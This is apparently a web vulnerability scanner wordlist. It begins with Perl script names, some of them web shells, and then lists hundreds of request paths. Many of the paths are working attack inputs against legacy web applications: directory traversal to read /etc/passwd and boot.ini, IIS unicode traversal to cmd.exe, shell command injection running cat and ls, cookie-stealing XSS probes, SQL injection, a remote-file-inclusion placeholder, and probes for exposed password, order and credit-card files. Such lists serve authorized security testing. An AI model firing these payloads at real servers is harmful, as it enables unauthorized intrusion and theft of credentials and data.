pl.txt

spellchecker.pl
basexml.pl
commands.pl
io.pl
upload_fck.pl
util.pl
fckeditor.pl
makemini.pl
code-style.pl
convertcfg.pl
1.pl
genpackage.xml.pl
test.pl
upgrade.pl
cntstems.pl
lst.pl
brace_style.pl
docblocks.pl
longlines.pl
config.pl
fetchInterwiki.pl
compare_schemas.pl
make-release.pl
showPrivateReferences.pl
my2pg.pl
delete-idle-wiki-users.pl
wp_mysql2postgres.pl
count_lines.pl
lgetl.pl
lgetr.pl
eliza.pl
eliza_daemon.pl
eliza_inetd.pl
eliza_server.pl
eliza_server_win32.pl
gab3.pl
eliza_thread.pl
gab4.pl
eliza_select.pl
gab5.pl
cat.pl
echo.pl
eliza_nonblock.pl
gab6.pl
web_fetch_p.pl
eliza_hup.pl
eliza_log.pl
prefork_pipe.pl
prefork_shm.pl
web_fork.pl
web_prefork1.pl
web_prefork2.pl
web_prethread1.pl
web_serial.pl
web_thread1.pl
gab7.pl
trav_cli.pl
trav_serv.pl
urg_recv.pl
urg_recv2.pl
urg_recv3.pl
urg_send.pl
udp_daytime_cli.pl
udp_daytime_cli2.pl
udp_daytime_multi.pl
udp_echo_cli1.pl
udp_echo_cli2.pl
udp_echo_cli3.pl
udp_echo_serv.pl
chat_client.pl
chat_server.pl
timed_chat_client.pl
timed_chat_server.pl
facfib.pl
interrupt.pl
read_three.pl
whos_there.pl
write_ten.pl
write_ten_i.pl
write_ten_ph.pl
broadcast_chat_client.pl
broadcast_echo_cli.pl
mchat_client.pl
mchat_server.pl
time_of_day_cli.pl
time_of_day_serv.pl
localtime_cli.pl
localtime_serv.pl
wrap_cli.pl
wrap_serv.pl
daytime_cli.pl
daytime_cli2.pl
ip_trans.pl
name_trans.pl
tcp_echo_cli1.pl
tcp_echo_serv1.pl
gab1.pl
gab2.pl
tcp_echo_cli2.pl
tcp_echo_serv2.pl
time_of_day_tcp2.pl
web_fetch.pl
change_passwd.pl
change_passwd_ssh.pl
ftp_mirror.pl
ftp_recent.pl
remoteps1.pl
autoreply.pl
mail_recent.pl
mailtools1.pl
send_email.pl
simple_mime.pl
simple_parse.pl
imap_stats.pl
newsgroups_stats.pl
pop_fetch.pl
pop_stats.pl
scan_newsgroups.pl
follow_chain.pl
format_html.pl
get_rfc.pl
get_url.pl
get_url2.pl
get_url3.pl
mirror_images.pl
mirror_rfc.pl
print_links.pl
remote_wc.pl
search_rfc.pl
search_rfc2.pl
search_rfc3.pl
simple_get.pl
comment.pl
conv.pl
extrename.pl
cgitelnet.pl
cmd.pl
dc.pl
list.pl
up.pl
wewo.pl
irc.pl
pws.pl
PerlWebShellbyRST-GHC.pl
14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
14all.cgi?cfg=../../../../../../../../etc/passwd
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
852566C90012664F
</etc/passwd>
<script>alert('Vulnerable')</script>
<script>alert('Vulnerable')</script>.aspx
<script>alert('Vulnerable')</script>.jsp
<script>alert('Vulnerable')</script>.shtm
<script>alert('Vulnerable')</script>.shtml
<script>alert('Vulnerable')</script>.stm
<script>alert('Vulnerable')</script>.thtml
?D=A
?M=A
?N=D
?Open
?OpenServer
?PageServices
?S=A
?\"><script>alert('Vulnerable');</script>
?mod=<script>alert(document.cookie)</script>&op=browse
?mod=node&nid=some_thing&op=view
?mod=some_thing&op=browse
?pattern=/etc/*&sort=name
?sql_debug=1
?wp-cs-dump
ADMINconfig.php
ASP/cart/database/metacart.mdb
AT-admin.cgi
AT-generate.cgi
Admin/
Admin_files/
Admin_files/order.log
Administration/
Agent/
Agentes/
Agents/
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AnyBoard.cgi
AnyForm
AnyForm2
Asp/
BACLIENT
Backup/add-passwd.cgi
C
CFIDE/administrator/index.cfm
CFIDE/probe.cfm
COM
CSMailto.cgi
CSMailto/CSMailto.cgi
CSNews.cgi
CVS/Entries
Cgitest.exe
Citrix/ICAWEB/
Citrix/MetaFrameXP/default/login.asp
Citrix/PNAgent/
Config1.htm
Count.cgi
DB4Web/10.10.10.10:100
DC
DCFORM
DCFORMS98.CGI
DCShop/auth_data/auth_user_file.txt
DCShop/orders/orders.txt
DEASAppDesign.nsf
DEASLog.nsf
DEASLog01.nsf
DEASLog02.nsf
DEASLog03.nsf
DEASLog04.nsf
DEASLog05.nsf
DEESAdmin.nsf
DMR/
Data/settings.xml+
DomainFiles/*//../../../../../../../../../../etc/passwd
EXE/
Excel/
File
FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek.cgi?head=&foot=;cat%20/etc/passwd
FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
FormMail.cgi?<script>alert(\
FormMail.pl
GW5/GWWEB.EXE
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
Gozila.cgi
HyperStat/stat_what.log
IBMWebAS/
IBMWebAS/apidocs/
IBMWebAS/configDocs/
IBMWebAS/docs/
IBMWebAS/mbeanDocs/
IDSWebApp/IDSjsp/Login.jsp
ISSamples/SQLQHit.asp
ISSamples/sqlqhit.asp
IlohaMail/blank.html
ImageFolio/admin/admin.cgi
JUNK(10)
JUNK(10)abcd.html
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
JUNK(223)<font%20size=50>DEFACED<!--//--
JUNK(5).csp
JUNK(5).htw
JUNK(5).xml
JUNK(5)/
JUNK(6).cfm?mode=debug
LOGIN.PWD
LWGate
LWGate.cgi
LiveHelp/
MIDICART/midicart.mdb
MSword/
MWS/HandleSearch.html?searchTarget=test&B1=Submit
Mem/dynaform/FileExplorer.htm
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
MsmMask.exe
MsmMask.exe?mask=/junk334
Msword/
NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
NULL.printer
NetDetector/middle_help_intro.htm
NetDynamic/
NetDynamics/
OA_HTML/
OA_HTML/META-INF/
OA_HTML/PTB/ECXOTAPing.htm
OA_HTML/PTB/ICXINDEXBASECASE.htm
OA_HTML/PTB/mwa_readme.htm
OA_HTML/PTB/xml_sample1.htm
OA_HTML/_pages/
OA_HTML/jsp/
OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
OA_HTML/jsp/fnd/fndhelputil.jsp
OA_HTML/jsp/fnd/fndversion.jsp
OA_HTML/jsp/por/services/login.jsp
OA_HTML/jsp/wf/WFReassign.jsp
OA_HTML/oam/
OA_HTML/oam/weboam.log
OA_HTML/webtools/doc/index.html
OA_JAVA/
OA_JAVA/Oracle/
OA_JAVA/oracle/forms/registry/Registry.dat
OA_JAVA/servlet.zip
OA_MEDIA/
OpenFile.aspx?file=../../../../../../../../../../boot.ini
OpenTopic
Orders/order_log.dat
Orders/order_log_v12.dat
PDG_Cart/
PDG_Cart/oder.log
PDG_Cart/shopper.conf
PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
POSTNUKEMy_eGallery/public/displayCategory.php
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
Pages/
Pbcgi.exe
ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
Program%20Files/
README
README.TXT
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
SGB_DIR/superguestconfig
SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
SQLQHit.asp
SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
SUNWmc/htdocs/
SUNWmc/htdocs/en_US/
Search
SetSecurity.shm
SilverStream
SilverStream/Meta/Tables/?access-mode=text
Site/biztalkhttpreceive.dll
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
SiteScope/htdocs/SiteScope.html
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/Admin/commerce/foundation/domain.asp
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
SiteServer/Admin/knowledge/persmbr/vs.asp
SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
SiteServer/Publishing/ViewCode.asp
SiteServer/admin/
SiteServer/admin/findvserver.asp
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
Sources/
Statistics/
Stats/
StoreDB/
Survey/Survey.Htm
TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
USER/CONFIG.AP
Upload.pl
VBZooM/add-subject.php
Vs
VsSetCookie.exe?
W
WEB-INF./web.xml
WEB-INF/web.xml
WEBAGENT/CQMGSERV/CF-SINFO.TPF
WINDMAIL.EXE?%20-n%20c:\boot.ini%
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
WS_FTP.LOG
WS_FTP.ini
WebAdmin.dll?View=Logon
WebCacheDemo.html
WebShop/
WebShop/logs/cc.txt
WebShop/templates/cc.txt
WebSphereSamples
WebTrend/
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
Web_store/
Webnews.exe
XMBforum/buddy.php
XMBforum/member.php
XSQLConfig.xml
Xcelerate/LoginPage.html
YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc
YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
[SecCheck]/..%252f..%252f../ext.ini
[SecCheck]/..%255c..%255c../ext.ini
[SecCheck]/..%2f../ext.ini
\"><img%20src=\"javascript:alert(document.domain)\">
_cti_pvt/
_head.php
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
_mem_bin/
_mem_bin/FormsLogin.asp
_mem_bin/auoconfig.asp
_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
_mem_bin/remind.asp
_pages
_pages/_demo/
_pages/_demo/_sql/
_pages/_webapp/_admin/_showjavartdetails.java
_pages/_webapp/_admin/_showpooldetails.java
_pages/_webapp/_jsp/
_private/
_private/_vti_cnf/
_private/form_results.htm
_private/form_results.html
_private/form_results.txt
_private/orders.htm
_private/orders.txt
_private/register.htm
_private/register.txt
_private/registrations.htm
_private/registrations.txt
_vti_bin/
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/CGImail.exe
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_vti_bin/_vti_cnf/
_vti_bin/admin.pl
_vti_bin/cfgwiz.exe
_vti_bin/contents.htm
_vti_bin/fpadmin.htm
_vti_bin/fpcount.exe
_vti_bin/fpcount.exe/
_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
_vti_bin/fpremadm.exe
_vti_bin/fpsrvadm.exe
_vti_bin/shtml.dll/_vti_rpc
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/_vti_rpc
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/junk_nonexistant.exe
_vti_cnf/_vti_cnf/
_vti_inf.html
_vti_log/_vti_cnf/
_vti_pvt/access.cnf
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/botinfs.cnf
_vti_pvt/bots.cnf
_vti_pvt/deptodoc.btr
_vti_pvt/doctodep.btr
_vti_pvt/linkinfo.cnf
_vti_pvt/service.cnf
_vti_pvt/service.pwd
_vti_pvt/services.cnf
_vti_pvt/services.org
_vti_pvt/svacl.cnf
_vti_pvt/users.pwd
_vti_pvt/writeto.cnf
_vti_txt/
_vti_txt/_vti_cnf/
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a1disp3.cgi?../../../../../../../../../../etc
a1disp3.cgi?../../../../../../../../../../etc/passwd
a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
a1stats/a1disp3.cgi?../../../../../../../../../../passwd
a1stats/a1disp3.cgi?../../../../../../../etc/passwd
a1stats/a1disp4.cgi?../../../../../../../etc/passwd
a?<script>alert('Vulnerable')</script>
a_domlog.nsf
a_security.htm
ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
ab2/\@AdminViewError
abonnement.asp
acart2_0/acart2_0.mdb
acart2_0/admin/category.asp
acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
acart2_0/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
acartpath/signin.asp?|-|0|404_Object_Not_Found
acceso/
access-log
access.log
access/
access_log
acciones/
account.nsf
account/
accounting/
accounts.nsf
accounts/getuserdesc.asp
achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
active.log
activex/
add.php
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
add_acl
add_ftp.cgi
add_user.php
addbanner.cgi
addressbook.php?\"><script>alert(Vulnerable)</script><!--
addressbook/index.php?name=<script>alert('Vulnerable')</script>
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
adduser.cgi
addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
adm/
admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
admcgi/contents.htm
admcgi/scripts/Fpadmcgi.exe
admentor/adminadmin.asp
admin-serv/config/admpw
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
admin.cgi
admin.cgi?list=../../../../../../../../../../etc
admin.cgi?list=../../../../../../../../../../etc/passwd
admin.htm
admin.html
admin.nsf
admin.php
admin.php3
admin.php4?reg_login=1
admin.php?en_log_id=0&action=config
admin.php?en_log_id=0&action=users
admin.pl
admin.shtml
admin/
admin/admin.php?adminpy=1
admin/admin.shtml
admin/admin_phpinfo.php4
admin/adminproc.asp
admin/aindex.htm
admin/auth.php
admin/browse.asp?FilePath=c:\&Opt=2&level=0
admin/cfg/configscreen.inc.php+
admin/cfg/configsite.inc.php+
admin/cfg/configsql.inc.php+
admin/cfg/configtache.inc.php+
admin/cms/htmltags.php
admin/contextAdmin/contextAdmin.html
admin/cplogfile.log
admin/credit_card_info.php
admin/database/wwForum.mdb
admin/datasource.asp
admin/db.php
admin/db.php?dump_sql=1
admin/exec.php3
admin/exec.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=dir%20c:\
admin/index.php
admin/login.php?action=insert&username=test&password=test
admin/login.php?path=\"></form><form
admin/modules/cache.php+
admin/objects.inc.php4
admin/phpinfo.php
admin/script.php
admin/settings.inc.php+
admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
admin/system.php3?cmd=cat%20/etc/passwd
admin/system.php3?cmd=dir%20c:\
admin/system_footer.php
admin/templates/header.php
admin/upload.php
admin/wg_user-info.ml
admin4.nsf
admin5.nsf
admin_t/include/aff_liste_langue.php
adminhot.cgi
administration/
administrator/
administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/uploadimage.php
administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
adminwww.cgi
admisapi/fpadmin.htm
adovbs.inc
adsamples/config/site.csc
adv/gm001-mc/
advwebadmin/
advworks/equipment/catalog_type.asp
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
aff_news.php
affich.php?image=<script>alert(document.cookie)</script>
agentadmin.php
agentes/
agentrunner.nsf
aglimpse
aglimpse.cgi
akopia/
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
alog.nsf
amadmin.pl
ammerum/
anacondaclip.pl?template=../../../../../../../../../../etc
anacondaclip.pl?template=../../../../../../../../../../etc/passwd
analog/
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
anthill/login.php
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
anyboard.cgi
apache/
apex/
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
aplogon.html
app/
appdet.html
applicattion/
applicattions/
applist.asp
approval/ts_app.htm
apps/
apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
archie
architext_query.cgi
architext_query.pl
archivar/
archive.asp
archive/
archive/a_domlog.nsf
archive/l_domlog.nsf
archive_forum.asp
archives/
archivo/
ariadne/
article.cfm?id=1'<script>alert(document.cookie);</script>
article.php?article=4965&post=1111111111
article.php?sid=\"><Img
ash
ashnews.php
asp/
asp/SQLQHit.asp
asp/sqlqhit.asp
astrocam.cgi
atc/
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
athenareg.php?pass=%20;cat%20/etc/passwd
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
auction/auction.cgi?action=
auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
auctiondeluxe/auction.pl
auktion.cgi?menue=../../../../../../../../../../etc
auktion.cgi?menue=../../../../../../../../../../etc/passwd
auth.inc.php
auth/
auth_data/auth_user_file.txt
author.asp
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
autologon.html?10514
awebvisit.stat
awl/auctionweaver.pl
awstats.pl
awstats/awstats.pl
ax-admin.cgi
ax.cgi
axis-cgi/buffer/command.cgi
axs.cgi
ayuda/
b2-include/b2edit.showposts.php
b2-tools/gm-2-b2.php
ba4.nsf
backdoor/
backup/
badmin.cgi
bak/
ban.bak
ban.dat
ban.log
banca/
banco/
bandwidth/index.cgi
bank/
banmat.pwd
banner.cgi
bannereditor.cgi
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
bash
basilix.php3
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
basilix/
basilix/compose-attach.php3
basilix/mbox-list.php3
basilix/message-read.php3
bb-ack.sh
bb-dnbd/faxsurvey
bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
bb-hist?HI
bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
bb-histlog.sh
bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
bb-rep.sh
bb-replog.sh
bb000001.pl<script>alert('Vulnerable')</script>
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbs_forum.cgi
bbv/
bc4j.html
bdata/
bdatos/
beta/
betsie/parserl.pl/<script>alert('Vulnerable')</script>;
betsie/parserl.pl/<script>alert('XSS')</script>;
bigconf.cgi
bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
bigsam_guestbook.php?displayBegin=9999...9999
billing.nsf
billing/billing.apw
bin/
bin/CGImail.exe
bin/admin.pl
bin/cfgwiz.exe
bin/common/user_update_passwd.pl
bin/contents.htm
bin/fpadmin.htm
bin/fpremadm.exe
bin/fpsrvadm.exe
bizdb1-search.cgi
biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
blah-whatever-badfile.jsp
blah-whatever.jsp
blah123.php
blah_badfile.shtml
blahb.ida
blahb.idq
blog/
blog/mt-check.cgi
blog/mt-load.cgi
blog/mt.cfg
bmp/
bmp/JSPClient.java
bmp/README.txt
bmp/global-web-application.xml
bmp/mime.types
bmp/setconn.jsp
bmp/sqljdemo.jsp
bnbform
bnbform.cgi
board/index.php
board/philboard_admin.asp+
boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
bookmark.nsf
books.nsf
boot/
boozt/admin/index.cgi?section=5&input=1
bottom.html
bsguest.cgi?email=x;ls
bslist.cgi?email=x;ls
buddies.blt
buddy.blt
buddylist.blt
bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
bugtest+/+
build.cgi
bulk/bulk.cgi
busytime.nsf
buy/
buynow/
bytehoard/index.php?infolder=../../../../../../../../../../../etc/
c/
c/winnt/system32/cmd.exe?/c+dir+/OG
c32web.exe/ChangeAdminPassword
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
c_download.cgi
ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
cache-stats/
cached_feed.cgi
cachemgr.cgi
caja/
cal_make.pl?p0=../../../../../../../../../../etc
cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
calendar
calendar.nsf
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
calendar.pl
calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
calendar/index.cgi
calendar_admin.pl?config=|cat%20/etc/passwd|
calender_admin.pl
campas?%0acat%0a/etc/passwd%0a
carbo.dll
card/
cards/
cart.pl
cart.pl?db='
cart/
cart32.exe
cartcart.cgi
cartmanager.cgi
cash/
catalog.nsf
catalog/includes/include_once.php
categorie.php3?cid=june
catinfo
catinfo?<u><b>TESTING
caupo/admin/admin_workspace.php
cbmc/forums.cgi
cbms/cbmsfoot.php
cbms/changepass.php
cbms/editclient.php
cbms/passgen.php
cbms/realinv.php
cbms/usersetup.php
ccard/
ccbill-local.cgi?cmd=MENU
ccbill-local.pl?cmd=MENU
ccbill/secure/ccbill.log
ccbill/whereami.cgi
cd-cgi/sscd_suncourier.pl
cd/
cdrom/
cehttp/property/
cehttp/trace
cersvr.nsf
cert/
certa.nsf
certificado/
certificate
certificates
certlog.nsf
certsrv.nsf
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
cfcache.map
cfdocs.map
cfdocs/cfcache.map
cfdocs/cfmlsyntaxcheck.cfm
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
cfdocs/exampleapp/email/application.cfm
cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
cfdocs/exampleapp/publish/admin/addcontent.cfm
cfdocs/exampleapp/publish/admin/application.cfm
cfdocs/examples/httpclient/mainframeset.cfm
cfdocs/expeval/displayopenedfile.cfm
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
cfdocs/expeval/openfile.cfm
cfdocs/expeval/sendmail.cfm
cfdocs/snippets/evaluate.cfm
cfdocs/snippets/fileexists.cfm
cfdocs/snippets/gettempdirectory.cfm
cfdocs/snippets/viewexample.cfm
cfgwiz.exe
cfide/Administrator/startstop.html
cfide/administrator/index.cfm
cgforum.cgi
cgi-bin-sdb/printenv
cgi-bin/
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
